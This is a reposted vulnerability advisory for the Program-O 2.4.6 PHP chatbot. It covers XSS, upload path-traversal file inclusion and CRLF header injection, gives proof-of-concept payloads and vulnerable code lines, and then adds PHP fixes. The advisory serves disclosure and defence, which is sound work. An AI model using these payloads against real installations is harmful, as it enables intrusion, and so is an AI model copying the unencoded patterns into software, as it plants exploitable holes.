Aerosol Posted January 23, 2015

Program-O version 2.4.6 suffers from HTTP response splitting, cross site scripting, and local file inclusion vulnerabilities.

Document Title:
===============
Program-O v2.4.6 - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1414

Release Date:
=============
2015-01-21

Vulnerability Laboratory ID (VL-ID):
====================================
1414

Common Vulnerability Scoring System:
====================================
6.3

Product & Service Introduction:
===============================
Welcome to the Program O Project website. This is the home of the Open Source PHP MySQL AIML Chatbot Project. Program O is an AIML engine written in PHP with MySQL. Here you can find support, help, bot addons, a brilliant and friendly community and of course the Program O download files.

(Copy of the Vendor Homepage: http://blog.program-o.com/ )

Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered multiple vulnerabilities in the official Program-O v2.4.6 web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-21: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Program O
Product: Program O AIML Chatbot - Web Application 2.4.6

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Proof of Concept (PoC):
=======================
1.1 Client-Side Cross Site Scripting Vulnerability

The XSS vulnerabilities can be exploited by remote attackers without a privileged application user account and with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

http://localhost/Program-O/gui/xml/index.php?convo_id=444%22/%3E%3Csvg/onload=alert%281%29%3E

Cause (the request parameter is echoed without output encoding):

echo $convo_id;

$post_vars = filter_input_array(INPUT_POST) ?: array();
$get_vars = filter_input_array(INPUT_GET) ?: array();
$request_vars = array_merge($get_vars, $post_vars);
$convo_id = isset($request_vars['convo_id']) ? $request_vars['convo_id'] : get_convo_id(); // ternary condition reconstructed

1.2 Client-Side Cross Site Scripting Vulnerability

http://localhost/Program-O/gui/xml/index.php/%22%3E%3Csvg/onload=alert%280%29%3E

./Program-O/gui/xml/index.php

echo $_SERVER['PHP_SELF'];

3. /logs/index.php

$iframeURL = isset($_POST['file']) ? $_POST['file'] : 'about:blank'; // ternary condition reconstructed
echo $iframeURL;

<form action="http://localhost/Program-O/logs/index.php" method="POST">
<input type="hidden" name="file" value='paulos"/></iframe></div><svg/onload=alert(0)>'>
</form>

2.1 Application-Side Cross Site Scripting Vulnerability

The persistent input validation vulnerabilities can be exploited by remote attackers with a low privileged application user account and with low user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/validateAIML.php

Cause (the uploaded file name is echoed without output encoding):

echo $status;
$status = "File $fileName is valid.<br />\n";

Giving valid AIML files names like <svg/onload=alert(0)> should do the trick.

2.2 Application-Side Cross Site Scripting Vulnerability (only in older PHP server versions)

/admin/file.php

print "File <strong>$req_file</strong> doesn't exist.";
$req_file = basename($_GET['file']);

Exploit: ?file=">>payload

3. File Manipulation - Local File Include

The local file include vulnerability can be exploited by remote attackers with a low privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/validateAIML.php

Cause (the client-supplied file name is used in the target path unchecked):

if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
$target = $uploadDir . $ip . '/' . $tf;
$uploadDir = _UPLOAD_PATH_;
define('_UPLOAD_PATH_', _CONF_PATH_ . 'uploads' . $path_separator); // global_config.php define()
define('_CONF_PATH_', _BASE_PATH_ . 'config' . $path_separator);    // global_config.php define()
define('_BASE_PATH_', $parentFolder);                                // global_config.php define()

Exploitation is to give your file(s) names like ../../../file so when they get uploaded, they can cause LFI.

4. LFI, File Manipulation (RCE in some special cases only!)

The local file include vulnerability can be exploited by remote attackers with a low privileged application user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

/admin/upload_old.php

if (move_uploaded_file($_FILES['aimlfile']['tmp_name'], $file))
$file = './uploads/' . $_FILES['aimlfile']['name'];

The exact same issue exists in admin/upload.php.

5.1 HTTP Response Splitting (CRLF)

The HTTP Response Splitting issues can be exploited by remote attackers without a privileged application user account and with medium or high user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

header("Refresh: 5; url=$whoami?file=$req_file&send_file=yes");
$whoami = basename(__FILE__);
$req_file = basename($_GET['file']);

5.2 HTTP Response Splitting (CRLF)

/admin/download.php

Cause (the Referer header is copied into a response header unchecked):

$referer = $_SERVER['HTTP_REFERER'];
header("Refresh: 5;url=file.php?file=$zipFilename&send_file=yes&referer=$referer&msg=$msg");

So as long as we spoof our referer to %0A%0DContent-Injection:goes-here

Security Risk:
==============
1.1 - 1.2
The security risk of the client-side cross site scripting vulnerabilities is estimated as medium. (CVSS 2.6)

2.1 - 2.2
The security risk of the application-side input validation web vulnerabilities is estimated as medium. (CVSS 3.7)

3.0
The security risk of the local file include web vulnerability is estimated as high. (CVSS 6.1)

4.0
The security risk of the local file manipulation issue and code execution vulnerability is estimated as high. (CVSS 6.4)

Credits & Authors:
==================
Paulos Yibelo (paulosyibelo.com)
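The XSS findings (1.1, 1.2, 2.1, 2.2) and the CRLF findings (5.1, 5.2) share one root cause: request data reaches an HTML sink or a response header without being encoded for that context. The following is an added example, not code from the advisory or from the Program-O project; the helper names h(), header_param(), safe_referer() and refresh_header() are my own choices, and the demonstration inputs at the bottom are the advisory's own payloads, constructed here as plain strings:

```php
<?php
// Added example (not Program-O code): context-appropriate encoding for the
// HTML sinks (findings 1.x, 2.x) and the Refresh header (findings 5.x).
// Function names are illustrative; only htmlspecialchars(), rawurlencode(),
// filter_var() and parse_url() are real PHP built-ins.

declare(strict_types=1);

// Encode a value for an HTML text or attribute context. ENT_QUOTES also
// escapes single quotes, which matters inside value='...' attributes.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Encode a value for use as a query-string parameter inside a header.
// rawurlencode() turns CR and LF into %0D and %0A, so a value can no
// longer terminate the header and start a new one.
function header_param(string $value): string
{
    return rawurlencode($value);
}

// Accept a referer only if it is a well-formed http(s) URL with no control
// characters; anything else becomes an empty string instead of being copied.
function safe_referer(?string $referer): string
{
    if ($referer === null || preg_match('/[\x00-\x1F\x7F]/', $referer)) {
        return '';
    }
    if (filter_var($referer, FILTER_VALIDATE_URL) === false) {
        return '';
    }
    $scheme = strtolower((string) parse_url($referer, PHP_URL_SCHEME));
    return in_array($scheme, ['http', 'https'], true) ? $referer : '';
}

// The admin/download.php Refresh header rebuilt with every dynamic part encoded.
function refresh_header(string $zipFilename, string $referer, string $msg): string
{
    return 'Refresh: 5;url=file.php?file=' . header_param($zipFilename)
        . '&send_file=yes&referer=' . header_param(safe_referer($referer))
        . '&msg=' . header_param($msg);
}

// --- demonstration with the advisory's payloads as constructed inputs ---
$convo_id = '444"/><svg/onload=alert(1)>';               // finding 1.1
$fileName = '<svg/onload=alert(0)>';                     // finding 2.1
$referer  = "http://x/\r\nContent-Injection:goes-here";  // finding 5.2

echo h($convo_id), "\n";
echo 'File ' . h($fileName) . " is valid.<br />\n";
echo refresh_header('bot.zip', $referer, 'done'), "\n";

// For the PHP_SELF sink (finding 1.2) prefer a value the client cannot shape,
// such as the script's own file name, and encode it like any other output.
echo h(basename(__FILE__)), "\n";
```

Run under the PHP CLI, the first two lines show the angle brackets and quotes of the payloads replaced by entities, and the Refresh header comes out with an empty referer parameter because the CRLF-carrying value failed validation. The header() function in maintained PHP releases already refuses a header containing a newline, but encoding each component keeps the behaviour independent of that runtime check and also stops the parameters from being split or overridden by stray & and = characters.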
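Findings 3 and 4 both come from passing the client-supplied upload name straight into the target path. The following is an added example, not code from the advisory or from the Program-O project; the helper names sanitize_aiml_name(), upload_target() and store_upload() are my own choices, and the per-client $ip subfolder mirrors the $target construction shown for admin/validateAIML.php above:

```php
<?php
// Added example (not Program-O code): keeping uploaded AIML files inside the
// configured upload directory, for findings 3 and 4. Function names are
// illustrative; the upload directory is passed in instead of reading the
// _UPLOAD_PATH_ constant from global_config.php.

declare(strict_types=1);

// Reduce a client-supplied file name to a single safe path component.
// Returns null when the name is empty, carries a directory part or traversal,
// or does not look like a plain *.aiml file.
function sanitize_aiml_name(string $clientName): ?string
{
    $name = basename(str_replace('\\', '/', $clientName)); // drop any directory part
    if ($name === '' || $name === '.' || $name === '..') {
        return null;
    }
    // Conservative character set plus the required extension.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\.aiml$/', $name)) {
        return null;
    }
    return $name;
}

// Resolve the final target and verify it stays under $uploadDir even after
// realpath() resolves symlinks and "..". $ip is the per-client subfolder.
function upload_target(string $uploadDir, string $ip, string $clientName): ?string
{
    $name = sanitize_aiml_name($clientName);
    if ($name === null || !preg_match('/^[0-9a-fA-F.:]{1,45}$/', $ip)) {
        return null;
    }
    $base = realpath($uploadDir);
    if ($base === false) {
        return null;
    }
    $dir = $base . DIRECTORY_SEPARATOR . $ip;
    if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
        return null;
    }
    $dirReal = realpath($dir);
    // Containment check: the resolved directory must sit below the resolved base.
    if ($dirReal === false
        || strpos($dirReal . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $dirReal . DIRECTORY_SEPARATOR . $name;
}

// Replacement for the unchecked move_uploaded_file() calls: $file is one
// entry of $_FILES (e.g. $_FILES['uploaded'] or $_FILES['aimlfile']).
function store_upload(array $file, string $uploadDir, string $ip): bool
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    $target = upload_target($uploadDir, $ip, (string) $file['name']);
    return $target !== null && move_uploaded_file($file['tmp_name'], $target);
}

// --- demonstration with constructed names; no file is written ---
var_dump(sanitize_aiml_name('../../../file'));              // traversal attempt from finding 3
var_dump(sanitize_aiml_name('greeting.aiml'));               // ordinary AIML upload
var_dump(sanitize_aiml_name('<svg/onload=alert(0)>.aiml'));  // file name from finding 2.1
```

basename() alone is not a full fix: it strips directories but leaves names that can still reach other sinks, which is why the example also whitelists the characters and extension and then confirms the resolved directory with realpath() before moving the file. Checking is_uploaded_file() and the error code first prevents the move from being attempted on anything other than a genuine PHP upload.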